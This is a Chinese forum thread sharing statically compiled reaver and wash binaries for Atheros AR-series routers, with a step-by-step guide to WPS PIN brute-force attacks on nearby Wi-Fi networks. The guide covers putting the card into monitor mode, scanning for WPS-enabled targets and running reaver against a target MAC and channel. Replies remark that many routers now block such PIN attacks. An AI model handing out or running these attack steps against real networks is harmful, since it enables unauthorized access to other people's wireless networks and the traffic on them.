路由器跑pin用 reaver 和 wash 静态编译(不需要安装-不需要其它库)高通AR系列CPU
本帖最后由 jiuweiljp 于 2018-8-3 10:47 编辑本程序在ar系列的平台下运行,使用静态编译。
为什么使用静态编译呢,能在路由中用的reaver特别挑libpcap库要低版本的ver 1.1.1,我记得bb是1.5.3 ,lede都用1.8.1了(官方的ipk包已经没有1.1.1了且用的MUSL库,老的编译用uclibc不能通用)
编译过程很辛苦,编译时可不是加 -static 就能解决的,代码东落西凑,编译完成还要测试,很磨人!!
注意:只支持cpu的类型:大端的mips平台(ar71xx全系列)新的高通其它cpu没有条件测试,
小端mips 肯定不行(mt7620已测试不能用)。
简单解释一下什么是静态编译:
优点:
1.就是不依赖于任何其它共享库,直接运行。(有点像 windows 下的绿色版)
2.与linux的核心版本关系不大(条件关系,我只部分测试)。
3.其它第三方固件个人理解应该能运行,硬件结构类似就行了
(需要能把文件传到路由器上去:{:1_1:},ddwrt好像不能传文件吧,很久没有用它了,如果能传文件也能运行的)。
缺点:
因为把需要的库编译时全打包在一个文件内了,所以文件体积大。
推荐运行方式:
1、16MB Flash 以上或挂u盘
2、64MB 及以上内存(32MB也可以用 但容易出些错)
其它运行方式
4MB Flash,建议挂U盘,但你的路由器的内存大于32MB也可以在内存中运行,掉电后不能继续只能从头开始
8MB Flash ,建议挂U盘,
16MB Flsha ,可以在falsh中用
简易教程:
1、现将你的无线网卡down下来
ifconfig wlanX down
2、启用无线网卡的监听模式(考虑到有些人没有安装aircrack-ng我后面也将airmon-ng一并提供)
airmon-ng start wlanX
3、查看附近有没有开wps的路由(就是能不能弄)
注意:在放置文件的目录下运行
./wash -i mon0
4、开始攻击
注意:在放置文件的目录下运行
./reaver -i mon0 -b xx:xx:xx:xx:xx:xx(目标的mac地址) -c x (目标的频道号) -vv -a
reaver及wash另外的使用方式请自己百度
另外:考虑到没有安装aircrack-ng包的路由,自己可以安装一个,这个包我静态编译过,结果有点太大了,就没有发出了
本次将其中的一个需要文件上传。
本次编译使用了别人提供的libpcap (1.1.1-2)r i g h t .com.cn/FORUM/thread-205123-1-1.html
不同的libpcap和reaver版本 编译了3个不同程序,大家自己测试吧!!!!
1、文件解压缩
tar xavf reaver1.tar.gz
2、配置
因reaver 需要一个小数据库,文件解压后将etc/reaver/reaver.db 文件复制路由器的/etc/reaver/ 的目录下
mkdir /etc/reaver
cp etc/reaver/reaver.db /etc/reaver/
在路由器中补充下,自己可以安装一个screen 包
这里就不发教程了,网上一大把 加分。。。 这是个加分题哦 感觉高大上的样子,烧脑{:1_1:} 挺莫名觉厉,反正我是看不懂{:1_1:} 暴龙之燚 发表于 2018-8-4 14:20
挺莫名觉厉,反正我是看不懂
会用的,自然会懂。已经写的很简单了 :lol东西是好东西,可惜现在大多数路由都防pin了。。 这个是用路由PJ对吧,就不用无线网卡了!!! 现在的问题是很多路由器根本没wps了,有wps的也锁10个
难啊:'(
页:
[1]